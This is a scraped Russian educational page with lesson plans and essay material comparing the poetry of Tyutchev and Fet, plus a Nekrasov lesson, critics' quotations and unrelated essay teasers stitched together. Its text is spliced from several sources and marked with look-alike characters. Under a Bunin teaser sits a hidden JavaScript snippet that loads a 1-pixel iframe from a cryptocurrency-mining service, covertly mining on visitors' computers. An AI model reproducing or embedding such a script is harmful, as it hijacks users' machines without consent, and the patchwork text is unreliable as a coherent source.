Сопоставительный анализ творчества тютчева и фета. Сочинение на тему «сходства и различия с лирике тютчева и фета


В результате изучения темы у учащихся должно ᴄᴫᴏжиться четкое представление об особенностях поэтического стиля Ф. Тютчева и А. Фета

В начале урока учитель вместе с классом составляет обобщающую таблицу, которая записывается в тетрадях.

Особенности поэтического стиля Тютчева и Фета

Тютчев Фет

Философский характер поэзии, мысль в которой всегда сливается с образом

В поэзии Тютчев стремится осмыслить жизнь Вселенной, постичь тайны космоса и человеческого бытия

Трагический характер лирики, доминирующее чувство - напряжение, вместе с тем присущий поэзии Фета свет и оптимизм. Диалектика трагедии и радости, преодоление драматических ситуаций чувством гармонии мира
Жизнь, по Тютчеву, - это противоборство враждебных сил. Драматизм восприятия действительности в сочетании с неиссякаемой любовью к жизни Красота в его стихах - это преодоленное страдание, радость, добытая из боли. Жизнь в стихах Фета - миг, закрепленный в вечности
Человеческое «я» по отношению к природе - не капля в океане, а две равные беспредельности. Внутренние, незримые движения человеческой души созвучны зримой диалектике явлений природы Импрессиоʜᴎϲтский характер изображения чувств, их фрагментарность и предельная образность. Строгая художественная структура стихов, их внутреннее равновесие и ощущение эскизности, нарочитой оборванности
Образная система лирики Тютчева сочетает предметные реалии внешнего мира и субъективные впечатления от этого мира, производимые на лирика. Мастерство в изображении гармонии предметных реалий мира внешнего и глубины мира внутреннего Повышенная метафоричность поэзии, динамичность и музыкальность художественных образов. Преобладание настроения над мыслью, мысль «растворена» в музыке
Мастерство лирика в создании фонетических И живописных образов, сочетание звукописи С неожиданной палитрой красок, цветных образов Мастерство в использовании параллелизмов, повторов, периодов, ритмических пауз, богатство и глубина поэтических интонаций, звуковой инструменᴛᴏʙки

Во второй половине урока можно организовать самостоятельную исследовательскую работу по сопоставительному анализу стихотворения Ф. Тютчева «Еще земли печален вид…» и стихотворения А. Фета «Еще весны душистой нега…» и подгоᴛᴏʙку к самостоятельной письменной работе, которую можно начать в классе, а завершить дома.

Задания для сопоставительного анализа Выявите особенности художественной формы каждого стихотворения. Какой поэтический смысл можно при этом заметить?

О чем эти стихотворения? Есть ли в них аллегорический подтекст?

Какие образы стихотворений можно считать образами-символами? Сопоставьте лексику, синтаксис, поэтические интонации стихотворений. Сделайте выводы о сходстве и различии чувств и художественных образов этих стихотворений. Сделайте выводы об основных особенностях поэтического стиля Тютчева и Фета, проявившихся в этих стихотворениях.

«Мне борьба мешала быть поэтом, песни мне мешали быть борцом». Личность и судьба Н. А. Некрасова

Николай Алексеевич Некрасов В словах Некрасова, которые можно взять эпиграфом к творчеству лирика, - причина внутренних противоречий в его мировоззрении и творчестве. Поэт - лирик по сути - всю жизнь подчинял свое поэтическое творчество политическим и общественным задачам. Он не ждал для своих «песен» божественных звуков, ʜᴎϲпосланных свыше, а стремился учить свою музу, какой она должна быть.

По мнению Некрасова, муза обязана «дикᴛᴏʙать» поэту строки, исполненные сострадания к угнетенному и обездоленному народу, быть музой «мести и печали»

В начале урока - небольшой концерт из стихотворений Некрасова, а кроме того эмоциональный рассказ о наиболее важных страницах жизни и творчества лирика. Можно прочитать в классе стихи, показывающие глубокие чувства сострадания к русскому народу, стихи о любви, о задачах поэтического творчества, к примеру: «Надрывается сердце от муки…», «Ты всегда хороша несравненно… », «Внимая ужасам войны…», «Праздник жизни - молодости годы…

», «Поэту» («Любовь и Труд - под грудами развалин…»), «Русскому писателю».

Вопросы классу на выявление восприятия Какие жизненные проблемы волновали лирика? Каким вам представляется его облик в этих стихах? Основой рассказа учителя о страницах биографии писателя может стать хронологическая схема: 1.

Детство в селе Грешневе на Волге, учеба в ярославской гимназии. 2. Первые годы жизни в Петербурге, конфликт с отцом, начало поэтической деятельности. Отрицательная оценка в критике сборника «Мечты и звуки».

3. Переломный момент в жизни Некрасова - сближение с Белинским. Некрасов - апологет «гоголевского направления» в литературе. Текст с сайта Биг Реферат РУ

«Физиология Петербурга». 4. Произведения первой половины 40-х годов: «Родина», «Современная ода», «Колыбельная песня», «В дороге» и др. Горечь и сострадание униженным, ирония в адрес «хозяев жизни».

Вопросы и задания для обсуждения стихотворения «Еду ли ночью по улице темной…» 1. Каким настроением проникнуто это стихотворение? Как бы вы определили его жанр (воспоминание, размышление, элегия, реквием, жанровая сцена)?

В чем истоки трагедии людей? Докажите, что доля женщины была особенно тяжела и беспросветна. Какой единственный выход находит героиня из нищеты и горя? 3. За что упрекает себя лирический субъект стихотворения? Почему он не может забыть матери своего ребенка? 4. Как случай из «частной жизни» помогает понять драматизм мира, в котором живут люди? Какие предметные реалии характеризуют мир, где живут герои? Почему мир беспощаден к ним? 5. Найдите ключевые слова в каждой части стихотворения. Как они связаны с поздним прозрением лирического субъекта? Как он оценивает свою «неудачную» любовь? Индивидуальные задания. Сопоставьте стихотворения «Еду ли ночью по улице темной…» и «В дороге». Есть ли в них основания для сопоставления?

Сопоставьте разные точки зрения на стихотворение «Еду ли ночью по улице темной…»: «Скажите от меня Некрасову, что его стихотворение в 9-й книжке [«Современника»] меня совершенно с ума свело; денно и нощно твержу я это удивительное произведение - и уже наизусть выучил» (из письма И. Тургенева В. Белинскому от 26 ноября 1847 года). «Кто способен написать стихотворения: „Филантроп“, „Эпилог к ненаписанной поэме“, „Еду ли ночью по улице темной… “, „Саша“, „Живя согласно с строгою моралью…

“, - тот может быть уверен в том, что его знает и любит живая Россия» (Д. Писарев, 1861). «Нельзя без содрогания и отвращения читать этой ужасной повести! В ней так много безнравственного, так много ужасающей нищеты!..

И нет ни одной отрадной мысли!.. Нет и тени того упования на благость провидения, которое всегда, постоянно подкрепляет злополучного нищего и удерживает его от преступления… Жаль, что муза г. Некрасова одна из самых мрачных и что он видит все в черном свете…

Как будто уже нет более светлой стороны?» (из рапорта цензора Е. Волкова, чиновника особых поручений при миʜᴎϲтре народного просвещения, инспектору А.

В 1847-1866 годах.

Некрасов - издатель и редактор «Современника». Основные темы и мотивы лирики Некрасова 1847-1866 годов. Важно учесть, что их жанровое многообразие: Стихи о тяжелой судьбе крестьян, городской бедноты, женской доле («Орина, мать солдатская», «В полном разгаре страда деревенская…», «О погоде», «Плач детей», «Забытая деревня» и др.); Лирические стихи о любви, о ᴄᴫᴏжных взаимоотношениях любящих людей («Ты всегда хороша несравненно…», «Мы с тобой - бестолковые люди…», «Я не люблю иронии твоей…

», «Прости» и др.); Стихи о поэзии, о ᴄᴫᴏжном противоречии между поэтическим призванием и общественным долгом («Праздник жизни - молодости годы…», «Безвестен я. Я с вами не стяжал…», «Блажен незлобивый поэт…

», «Поэт и гражданин» и др.); Стихи, посвященные ᴛᴏʙарищам по борьбе, революционным настроениям («Песня Еремушке», «На смерть Шевченко», «Тургеневу», «Белинский», «Размышления у парадного подъезда», «Памяти Добролюбова» и др.); Стихи о России, о высоком общественном назначении русского человека («Что ни год - уменьшаются силы…», «Саша», «Несчастные», «Возвращение», «Начало поэмы» и др.). 6

В 1867-1877 годах.

Некрасов - редактор и издатель журнала «Отечественные записки». Вершины поэтического творчества Некрасова в ϶ᴛόᴛпериод: Поэмы о декабристах («Дедушка», «Русские женщины»), сатирические поэмы («Недавнее время», «Современники»), поэма «Кому на Руси жить хорошо»; Элегические произведения («Душно без счастья и воли…», «Три элегии», «Уныние», «Утро», «Элегия»); Лирический цикл «Последние песни» (1876-1877) («Сеятелям», «Скоро стану добычею тленья…», «Зине», «О Муза!

я у двери гроба!.. »). 7. 8 января 1878 года - смерть Некрасова. Его поэтическое завещание - стихотворение «Зине». Зина - жена Некрасова.

Страницы: 1 2

Ее настоящее имя Фекла Оʜᴎϲимовна Викторова. Когда Некрасов познакомился с ней в 1871 году, ему было 50 лет, ей 18. Она была женщиной без образования. Когда он заболел, она так самоотверженно ухаживала за ним, что преждевременно состарилась. Информация с сайта Бигреферат.. Текст с сайта Биг Реферат РУ После его смерти она уехала из Петербурга и умерла в Сараᴛᴏʙе в 1915 году.

Вопросы и задания к стихотворению «Зине» С каким чувством поэт идет к смерти?

Какой жизненный итог подводит? Как и с каким настроением он рассуждает о своей посмертной славе? Почему он считает, что его слава «померкнет» после его смерти? Что для лирика представляет большую ценность в жизни: песни или борьба? Какой характер приобретает противоречие между поэтическим талантом и необходимостью участия в общественной борьбе?

За что упрекает себя поэт? Каков его нерукотворный памятник себе? Сопоставьте ᴇᴦᴏ позицию с поэтическими убеждениями Пушкина в стихотворении «Памятник».

Как проявляются в этом стихотворении гумаʜᴎϲтические взгляды Некрасова? Каким, по Некрасову, должно быть высокое предназначение человека?

Выводы. Сложная, полная неожиданностей и сомнений жизнь Некрасова отразилась в его произведениях. Он живо откликался на многие злободневные события своего времени; сочувствовал страдающим и обездоленным; учил свою музу, какой она должна быть; противопоставлял служение искусству борьбе за счастье угнетенных; восхищался своими соотечественниками, придерживающимися революционных позиций; тонко чувствовал интимные отношения между людьми, их ᴄᴫᴏжность и драматизм. Незадолго до смерти он приходит к убеждению, что он плохой поэт, учитывая, что подчинил свой поэтический талант политической борьбе, и плохой борец, учитывая, что сердце лирика, открытое «песням», не способно к последовательной и ожесточенной борьбе с врагами.

Страницы: 1 2

Страница 1 из 1



Анализ стихотворения Бунина «Одиночество» (сборник стихов «Листопад»)

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })(); ...


Общий анализ стихотворений Пушкина

В исключительно богатом и разнообразном творчестве Пушкина стихотворения занимают очень большое и значительное место. Еще на школьной скамье, в лицее, Пушкин задумывает ряд крупных литературных произведений: поэму, комедию, роман, - но все эти замыслы не получают осуществления и остаются не законченными на той или иной стадии работы. Зато Пушкин-лицеист пишет очень много стихотворений....


Материалы для анализа урока руководителем

В процессе внутришкольного контроля важную роль играет посещение уроков руководителями образовательного учреждения. Посещение уроков планируется на неделю, исходя из общих задач, намеченных в годовом плане работы школы. В плане посещения отмечаются классы, предметы, содержание и цель посещения. Цель посещения может быть общей, направленной на повышение эффективности учебного процесса всей школы, а также частной, например, изучение системы работы отдельного учителя и способов решения им конкретных педагогических задач на уроках (к примеру, закрепление изученного материала). Уроки молодых учителей руководители посещают с целью ознакомления с их стилем и системой работы, оказания им методической помощи. Уроки опытных учителей управленцы посещают, как правило, для того, чтобы обобщить их богатый педагогический опыт....


Лирика Ф. И. Тютчева в моем восприятии

С детских лет с нами стихи Федора Ивановича Тютчева. Я еще не умела читать, но уже знала наизусть: Люблю грозу в начале мая, Когда весенний, первый гром, Как бы резвяся и играя, Грохочет в небе голубом. В России все - от мала до велика - знают это стихотворение. Строки стихотворения «Весенняя гроза», его образы и его звучание слились для меня с образом и звучанием весенней грозы, стали ее выражением. Оно давно стало наиболее емким и поэтически точным выражением грозы над полем, лесом, садом, над зелеными просторами зачинающейся весны в России. Стихотворение «Весенняя гроза» по праву называют классическим. Оно выдержало труднейшее испытание временем и осталось живым произведением русской поэзии....


Приклад твору: Філософські мотиви в поезії Ф. И. Тютчева

Федір Іванович Тютчев коштує особняком у російському поетичному пантеоні. Він - сучасник Пушкіна. Але це ніяк не читається. Його поезія позбавлена тимчасових прикмет. Її стрижнем є не почуттєва емоція враження, а єдина світоглядна концепція. Поетика Тютчева осягає початки й підстави буття. У ній простежуються дві лінії. Перша прямо пов"язана з біблійним міфом про створення миру, друга, через романтичну поезію, сходить до античних подань про світ і космос. Античне вчення про походження світу цитується Тютчевим постійно. Вода - от основа буття, вона головний елемент життя: Ще в полях біліє сніг, А води вуж навесні шумлять - Біжать і будять сонний брег, Біжать, і блищать, і говорять......

Два величайших поэта своей эпохи - Федор Иванович Тютчев и Афанасий Афанасьевич Фет. Вклад этих писателей в систему русского стихосложения неоценим. В творчестве их обоих можно встретить черты, присущие многим литературным деятелям того времени. Возможно, именно поэтому этих двух поэтов так часто сравнивают. Между тем, и у Тютчева, и у Фета есть особые, неповторимые детали и настроения, которые не встретишь в творчестве другого.

Среди сходств творчества двух поэтов можно отметить то, как описывается внутренний мир лирических героев. И Тютчев, и Фет, уделяют большее внимание глубочайшим душевным переживаниям человека, портреты их лирических героев очень психологичны. Кроме психологизма оба поэта используют прием параллелизма: внутренний мир, настроение человека, его глубокие переживания и чувства часто находят отражение в природе.

Описания самой природы у поэтов так же схожи. У них природа двупланова: у нее есть пейзажная и психологическая сторона. Этим как раз и объясняется применение параллелизма: описание внешнего мира как бы переходит в описание эмоций лирического героя. Еще одно сходство – мотивы любовной лирики. Тютчев и Фет пережили жуткую трагедию: потеряли любимого человека, и эта потеря отразилась в характере их любовной лирики.

Несмотря на такое большое количество описанных выше сходных черт лирики Фета и Тютчева, в их творчестве достаточно много различий. Лирика Фета тяготеет более к описательной пейзажной тематике, в то время как стихотворения Тютчева обладают философским характером (хотя и у него достаточно пейзажных стихотворений). Отношение к жизни в стихотворениях поэтов так же разнится: Фет восторгается жизнью, а Тютчев воспринимает ее как бытие.

Поэты по-разному воспринимают природу и человека: для Тютчева природа – это огромный мир, перед лицом которого человек становится бессильным, а Фет воспринимает ее как живое существо, живущее в абсолютной гармонии с человеком. Различна и «техническая» сторона стихотворений. Фет в большом количестве использует синтаксические средства выразительности, особенно часто у него встречается композиционный повтор. Тютчев же чаще применяет иносказательные тропы, в особенности метафору и ее разновидности.

Итак, несмотря на большое количество найденных сходств, нельзя упускать из виду и огромный пласт различий между лирикой Фета и Тютчева. Поэты жили в одной эпохе, на них влияло одно общество и даже некоторые факты биографии у них сходны, поэтому не стоит удивляться, что в их творчестве есть некоторые сходные мотивы. Но при этом Фет и Тютчев являются самостоятельными творческими личностями, способными творить нечто самобытное и уникальное, вкладывая в это частичку своей души.

Особенности поэтического мира Тютчев Фет. Бытие воспринимает как катастрофу Поэт-философ, поэт-психолог Последний русский романтик Природа – живой, одухотворённый, многоликий мир Человек часто одинок и бессилен в сравнении с могуществом природы Для стихов характерна богатая метафоричность В жанровом отношении – тяготение к философской миниатюре, к поэтическому фрагменту. Поэт «чистого искусства» В историю поэзии вошёл как пейзажист Природа – прекрасное живое существо Человек – частица природы, существо, равноправное ей Любил изображать «переходные состояния» природы Художественный мир создаётся разнообразием ритмов, звуков, особым синтаксисом Фет – мастер композиции, использует все виды композиционных повторов (кольцо, анафора, рефрен) В жанровом отношении тяготеет к фрагменту, лирической миниатюре.

Слайд 10 из презентации «Тютчев и Фет» . Размер архива с презентацией 92 КБ.

Литература 9 класс

краткое содержание других презентаций

«Акмулла» - Страшней медведя – шатуна незнанье- Усилим, братья, к знанию влеченье. В одну из 12 волостей племени мин, а именно в Кульиль-Минскую входила деревня Туксанбаево, где родился Акмулла. И не только башкирскую. «Башкиры мои, надо учиться!» Башкиры, всем нам нужно просвещенье! Псевдоним, настоящее фамилия, имя, отчество Камалетдинов Мифтахетдин Камалетдинович. Макет подставки для книг, сделанная Акмуллой.

«Толстой Юность» - Меняется ли на протяжении повести Дмитрий Нехлюдов? В результате возникает ссора с неким Колпиковым. Вопрос: 5. Объясните, как вы понимаете значение слов «самопознание» и «самовоспитание?». Почему Николай Иртеньев называет семью Нехлюдова «логической семьёй»? Из биографии писателя. Нравственные проблемы повести Л.Н.Толстого «Юность». Первая половина юности заканчивается в ожидании следующей, более счастливой.

«Пушкин и свобода» - Промчись поверх невольных вод. «Кто, волны, вас остановил». Что значит выражение «минута вольности святой»? «К Чаадаеву». Ода «Вольность» Сказки («Ура! Что значит выражение «звезда пленительного счастья»? 4 строфа. Почему 2 часть начинается с противительного союза? 2. Пушкин не разделял взглядов декабристов на поэзию. Взыграйте, ветры, взройте воды, Разрушьте гибельный оплот! Как меняется интонация? Какие обращения использует?

«Евгений Онегин роман» - Ужель Евгений? Евгений Онегин – никакой не «лишний», а просто человек. Таблица 2 Таблица 3. Ход исследования. Результаты работы Таблица. Для анализа мы выбрали 1 и 8 главы романа, раскрывающие эволюцию образа героя. Результаты работы. Основной принцип в изображении меняющегося героя – принцип «противоречия». Выводы.

«Лицейская жизнь Пушкина» - Табель Пушкина Александра. Судьба на вечную разлуку, Быть может, породила нас! Рука в руку! Пущин Иван. Горчаков Александр Прозвище Франт. Приговорён к 31 году тюрьмы и ссылки. И вас багрила кровь и пламень пожирал! Сын директора лицея. Жилая комната. Редактор лицейских журналов, музыкант. Малиновский Иван Прозвище Казак. А ты, повеса из повес, На шалости рожденный, Удалый хват, головорез, Приятель задушевный… Пушкин Александр Прозвища Француз, Егоза. Учебный класс. Образовалась товарищеская семья.

«Сочинение по портретам Пушкина» - Какими синонимами можно заменить слово художник? Сравнивать необходимо параллельно. Слева темнеют (зеленые) ели, подчеркивая белизну стволов берез. Виртуальная экскурсия. Прежде всего поражают грачи, которые деловито обсели верхушки деревьев. Каким поэта представляет О. Кипренский, а каким В. Тропинин? От деревьев на снег падают (густые, фиолетовые) тени. А. К. Саврасов «Грачи прилетели». Слева темнеют (…) ели, подчеркивая белизну стволов берез. Обществознание. О. Кипренский В. Тропинин.

Обзор материала

Обзор материала

Цель: произвести сопоставительный художественный анализ стихотворений поэтов «чистого искусства» Ф.И. Тютчева и А.А. Фета.

Задачи:

Выявление изобразительно-выразительных средств; повторение литературоведческой терминологии (тропы и сти­листические фигуры, литературные направления);

Развитие художественного вкуса;

Воспитание любви к художественному слову.

Оборудование: проектор, мультимедийная презентация, текст стихотворений, музыкальное сопровождение.

Ход занятий.

I . Организационный момент.

II . Биография Ф.И. Тютчева и А.А. Фета. Сообщения студентов в сопровождении мультимедийной презентации.

1. Федор Иванович Тютчев (1803 – 1873гг). Слово учителя о творчестве поэта.

П амяти Тютчева (1873)

Ни у домашнего простого камелька,

Ни в шуме светских фраз и суеты салонной

Нам не забыть его, седого старика,

С улыбкой едкою, с душою благосклонной!

Ленивой поступью прошел он жизни путь,

Но мыслью обнял все, что на пути заметил,

И перед тем, чтоб сном могильным отдохнуть,

Он был как голубь чист и как младенец светел.

Искусства, знания, событья наших дней, -

Все отклик верный в нем будило неизбежно,

И словом, брошенным на факты и людей,

Он клейма вечные накладывал небрежно...

Вы помните его в кругу его друзей?

Как мысли сыпались нежданные, живые,

Как забывали мы под звук его речей

И вечер длившийся, и годы прожитые!

В нем злобы не было. Когда ж он говорил,

Язвительно смеясь над жизнью или веком,

То самый смех его нас с жизнию мирил,

А светлый лик его мирил нас с человеком!

А. Н. Апухтин

Стихотворения г. Ф. Т. принадлежат к немногим блестящим явлениям в области русской поэзии. Г<-н>. Ф. Т. написал очень не­много; но все написанное им носит на себе печать истинного и пре­красного таланта, нередко самобытного, всегда грациозного, испол­ненного мысли и неподдельного чувства...

Главное достоинство стихотворений г. Ф. Т. заключается в жи­вом, грациозном, пластически верном изображении природы. Он горячо любит ее, прекрасно понимает, ему доступны самые тонкие, неуловимые черты и оттенки ее, и все это превосходно отражается в его стихотворениях...

Н. А. Некрасов. Русские второстепенные поэты. 1850

В наших глазах, как оно ни обидно для самолюбия современ­ников, г. Тютчев, принадлежавший к поколению предыдущему, сто­ит решительно выше всех своих собратов по Аполлону. Легко ука­зать на те отдельные качества, которыми превосходят его более да­ровитые из теперешних наших поэтов: на пленительную, хотя несколько однообразную, грацию Фета, на энергическую часто су­хую и жесткую страстность Некрасова, на правильную, иногда хо­лодную живопись Майкова; но на одном г. Тютчеве лежит печать той великой эпохи, к которой он принадлежит и которая так ярко и сильно выразилась в Пушкине; в нем одном замечается та сораз­мерность таланта с самим собой, та соответственность его с жиз­нью автора, - словом, хоть часть того, что в полном развитии сво­ем составляет отличительные признаки великих дарований. <...>

Талант его, по самому свойству своему, не обращен к толпе и не от нее ждет отзыва и одобрения; для того, чтобы вполне оценить г. Тютчева, надо самому читателю быть одаренным некоторою гиб- костию понимания, некоторою гибкостью мысли, не остававшейся слишком долго праздной. <...> Г-н Тютчев может сказать себе, что он, по выражению одного поэта, создал речи, которым не суждено уме­реть, а для истинного художника выше подобного сознания награ­ды нет.

И. С. Тургенев. Несколько слов о стихотворениях Ф. И. Тютчева. 1854

Страстная любовь к жизни и постоянная тревога, в конечном счете обусловленная трагическим восприятием реальной действи­тельности, составляет основу мироощущения Тютчева...

Тютчев - поэт-мыслитель по преимуществу.

К. В. Пигарев. Ф. И. Тютчев и его время. 1978

Афанасий Фет, видевший в Тютчеве «одного из величайших лири­ков, существовавших на земле», с замечательной точностью сказал о поражающем двуединстве, воплотившемся в тютчевском творчестве:

Да, каждого, кто войдет сердцем и разумом в лирический мир Тютчева, не может не поразить это почти сверхъестественное сли­яние поистине вселенской мощи духа и предельной утонченности души. Слияние этих, казалось бы, несоединимых свойств и опре­деляет, в частности, незаменимость и абсолютную ценность голоса Тютчева в мировой лирике.

В. В. Кожинов. Тютчев. 1988

Внимательно прочитайте приведенные выше высказывания из­вестных поэтов, критиков, литературоведов о Тютчеве-художнике и его поэзии.

Какое представление у вас складывается по прочтении этих от­зывов о личности самого поэта, его духовном мире?

2. Из биографии поэта.

После долгой-долгой зимы, когда в полях еще «белеет снег», а в небе уже запевают первые жаворонки, невольно вспоминаются знакомые с детства и такие милые сердцу строки:

Весна идет, весна идет –

И тихих, теплых майских дней

Румяный, светлый хоровод

Толпится весело за ней!

Эти стихи более ста лет назад написал поэт Федор Иванович Тютчев, а мы читаем их сейчас, и нам кажется, что только такими простыми, точными и задушевными словами можно говорить о весне, о первых грозах, о прозрачных днях «осени первоначальной» - о родной русской природе.

Тютчев родился и вырос в деревне, в имении своего отца возле села Овстуг, Орловской губернии. Рано научился он любить природу и «дышать с природой одной жизнью», как говорил он позднее. Когда мальчику пошел десятый год, к нему пригласили учителя – Семена Егоровича Раича. Раич очень привязался к своему ученику, да и нельзя было не любить его. Это был ласковый, спокойный, очень талантливый мальчик. Раич - человек хорошо образованный, поэт, переводчик - первый пробудил в своем ученике любовь к поэзии. Он научил его понимать литературу, поощрял его желания писать стихи.

В пятнадцать лет Тютчев уже был студентом Московского университета. На восемнадцатом году он прекрасно окончил университет и через несколько месяцев уехал на службу в русское посольство за границу.

Двадцать два года прожил он в чужих краях, вдали от родины, но не переставал думать о ней, посвящать ей свои стихи. «Я более всего любил в мире отечество и поэзию», - писал Тютчев в одном из писем с чужбины.

Но стихов своих Тютчев почти не печатал, и очень долго имя его как поэта было неизвестно в России. Однажды один из друзей Тютчева передал Пушкину тетрадь его стихов. Пушкину стихи очень понравились, и он напечатал их в журнале «Современник», который тогда издавал.

Это было в 1836 году. С тех пор стихи Тютчева стали появляться в «Современнике», который тогда широко расходился по всей России. А отдельной книжкой они вышли только в 1854 году. Книжка была маленькая, скромная; в ней было всего сто стихотворений, но о ней сразу все заговорили - такие там были прекрасные стихи.

Тютчев оставил нам небольшое литературное наследство - немного больше трехсот стихотворений. Но, как справедливо сказал поэт Афанасий Афанасьевич Фет, небольшая книжка стихов Тютчева была «томов премногих тяжелей».

3. Творческий путь Афанасия Афанасьевича Фета (1820 – 1892гг.).

Стихи пленительные Фета.

А. Жемчужников

Афанасий Афанасьевич Фет - вы­дающийся лирик XIX века, талантливый публицист и переводчик. Его стихами восхищались Н.А. Некрасов и И.С. Тургенев, Л.Н. Толстой и М.Е. Салтыков-Щедрин; А.А. Блок считал Фета своим учителем. П.И. Чай­ковский высоко ценил поэта, который «сумел шагнуть в область музыки». На стихи Фета крупнейшие русские композиторы напи­сали много великолепных романсов: «Сад весь в цвету» (А. Аренский), «Свеж и душист твой роскошный венок» (Н. Римский- Корсаков), «В дымке-невидимке» (С. Танеев), «Я тебе ничего не скажу...» (П. Чайковский), «На заре ты ее не буди...» (А. Варламов) и другие.

Очень точно сказал о значении творчества А. А. Фета его со­временник - поэт А. Жемчужников:

Памяти Шеншина-Фета

Он в мире грезы и мечты,

Любя игру лучей и тени,

Подметил беглые черты

Неуловимых ощущений,

Невоплотимой красоты.

И пусть он в старческие лета

Менял капризно имена

То публициста, то поэта –

Искупят прозу Шеншина

Стихи пленительные Фета.

В чем же «пленительность» стихов Фета? Почему его судь­бу называют одновременно и счастливой, и печальной?

Поэтический мир Фета

Мотивы г. Фета заключают в себе иногда такие тонкие... можно сказать, эфирные оттенки чувства, что нет возможности уловить их в определенных отчетливых чертах, и их только чувствуешь в той внутренней музыкальной перспективе, которую стихотворение ос­тавляет в душе читателя... И самое произведение, и содержание его давно уже забылись, но мелодия его таинственно слилась с общею жизнью души нашей, сплелась с нашим духовным организмом.

В. П. Боткин. Русская литература. А. А. Фет. 1857

В семье второстепенных русских поэтов г. Фету бесспорно при­надлежит одно из видных мест. Большая половина его стихотворе­ний дышит самою искреннею свежестью, а романсы его распевает чуть ли не вся Россия. <...> Если при всей этой искренности, при всей легкости, с которой поэт покоряет себе сердца читателей, он все-таки должен довольствоваться скромною долей второстепенно­го поэта, то причина этого, кажется нам, заключается в том, что мир, поэтическому воспроизведению которого посвятил себя г. Фет, довольно тесен, однообразен и ограничен.

М. Е. Салтыков-Щедрин. Рецензия на собрание стихотворений Фета. 1863

Фет в лучшие свои минуты выходит из пределов, указанных по­эзии, и смело делает шаг в нашу область. <...> Это не просто поэт, но скорее поэт-музыкант, как бы избегающий даже таких тем, ко­торые легко поддаются выражению словом.

П. И. Чайковский - Константину] Р[оманову].

Художественное творчество есть самая изумительная, самая не­постижимая, самая таинственная тайна... Вы жаждете проникнуть в тайну творчества <...> в таинственную лабораторию, в которой целое жизненное явление претворялось совершенно в чуждый ему звук, краску, камень. Торопитесь спросить художника, еще не ос­тывшего над своим вдохновенным трудом. Увы! ответа нет! тайна творчества для него самого осталась непроницаемой тайной.

А. А. Фет. Два письма о значении древних языков в нашем воспитании. 1867

В лирике Фета - притом именно в высших ее образцах - по­чти не воссоздаются какие-либо цельные «объекты» художествен­ного видения (а только «детали» этих объектов). В стихах Фета пе­ред нами не предстает определенный природный мир, рельефные человеческие характеры (в том числе даже и характер лирического героя, то есть в конечном счете самого поэта), весомые события. В лирике поэта воплощены, в сущности, только состояния и движения человеческого духа.

В. В. Кожинов. Поэзия и судьба Афанасия Фета. 1981

Как поэта-мыслителя Фета отличают лирическая нежность и лирическая смелость. Он нежен, как утреннее пробуждение отро­ка, и смел, как дума видавшая жизнь мудреца. Вступая в область самого тонкого и таинственного, в область человеческих пережи­ваний, Фет вскрывает их природу, дает последовательность моти­вировок, он чувствует, что важно для лирика-мыслителя, - пред­чувствует. <...>

В конечном счете главное в поэзии Фета - ее высокая человеч­ность. Современная русская лирика испытала на себе безусловное влияние Фета, о чем говорят, прежде всего, творчество разных на ших поэтов, а также их признания.

Л. А. Озеров. «То, что вечно, - человечно». 1995

Какие оценки ближе вашему впечатлению от знакомства с поэзией Фета? Мотивируйте свое мнение.

Начало жизненного пути. Афанасий Афанасьевич Фет (1820-1892 гг.). Мать Фета, Каролина Шарлотта Фёт, в 1820 г. по­кинула Германию с русским дворянином Афанасием Неофитовичем Шеншиным. Вскоре родился Афанасий, которого Шеншин усыновил. Настоящий же отец будущего поэта - Иоганн Фёт - чи­новник, служивший в суде Дармштадта. По этим причинам Орлов­ская духовная консистория отлучила будущего поэта от рода Шеншиных. Отнята была фамилия и дворянское звание. Короткая фамилия Фёт принесла ее в владельцу «жесточайшие нравственные пытки» (фамилия Фёт обрусела и стала звучать как Фет).

Поэт ставит цель - вернуться в дворянское лоно Шенши­ных - и с фантастическим упорством добивается ее. (С 1873 года по разрешению Александра II Фет становится дворянином Шен­шиным.)

Образование. Учился в немецком городе Верро в пансионе, начал сочинять стихи.

Осенью 1838 года Фет стал студентом словесного отделения Московского университета. Восемнадцатилетний Афанасий начал неудержимо писать стихи и познакомился с Аполлоном Григорье­вым, тоже студентом, горевшим страстью к стихотворству. Друзья вместе готовили к печати первый «студенческий» сборник стихов Фета, который вышел под инициалами «А. Ф.». Уже следующий сборник появился в журнале под именем «А. Фет».

Литературоведы считают, что буква «ё» превратилась в «е» в фамилии поэта по вине наборщика.

Университет Фет окончил в 1844 г. Свою поэтическую увле­ченность не скрывал, наоборот, стремился обрести популярность.

Творческий дебют - сборник «Лирический пантеон» (1840). Стихи на страницах журналов «Москвитянин» и «Отечественные записки». Поэт, по утверждению Фета, - есть сумасшедший и ни­куда не годный человек, лепечущий «божественный вздор». Но стихи Фета, этот «божественный вздор», произвели неизгладимое впечатление на Н. В. Гоголя и В. Г. Белинского.

Военная служба. Фет вернуть дворянское звание и фа­милию. Военную службу в Херсонской губернии поэт использует для тренировки воли и выработки непоколебимого упорства к дос­тижению цели кратчайшим путем. Служит твердо и последова­тельно.

Цикл стихотворений о любви. Большинство стихотворений о любви поэт посвятил своей возлюбленной Марии Лазич, с кото­рой встретился в 1848 году. Но Фет не женился на девушке, так как в браке видел «существенное препятствие в продвижении по служ­бе». Совсем не подозревал поэт, что после смерти Марии, когда он достигнет известности и всех высот благополучия, произойдет не­предвиденное: он станет рваться из счастливого настоящего в про­шлое, в котором навсегда осталась его любимая девушка. Преобладающая тональность любовной лирики Фета - тра­гическая.

Стихи о природе. Сборник «Вечерние огни» - необычай­ный творческий взлет А. А. Фета.

Цикл стихотворений «о природе», «Весна», «Лето», «Осень», «Море». Растворяясь в природном мире, погружаясь в самые таин­ственные его глубины, лирический герой Фета обретает способ­ность видеть прекрасную душу природы.

Фета влечет природа в ее изменчивости, постоянной смене состояний, и он радуется каждому малому, «сиюминутному» про­явлению жизни, которая через мгновение окажется уже иной. Его привлекает неповторимость и трепетность этих мгновений.

Прозаические произведения Фета. С 1862 по 1871 гг. в журналах «Русский вестник», «Заря» и других были опубликованы два самых крупных прозаических цик­ла Фета: «Из деревни», «Записки о вольнонаемном труде». Это «деревенская проза»: циклы состоят из рассказов, очерков, новелл. Главный смысл прозы - «защита» своего помещичьего хозяйства и утверждение мысли о преимуществе вольнонаемного труда.

Поэзия и проза Фета - художественные антиподы. По мне­нию Фета, проза - язык жизни обыденной, а поэзия - жизнь чело­веческой души и природы.

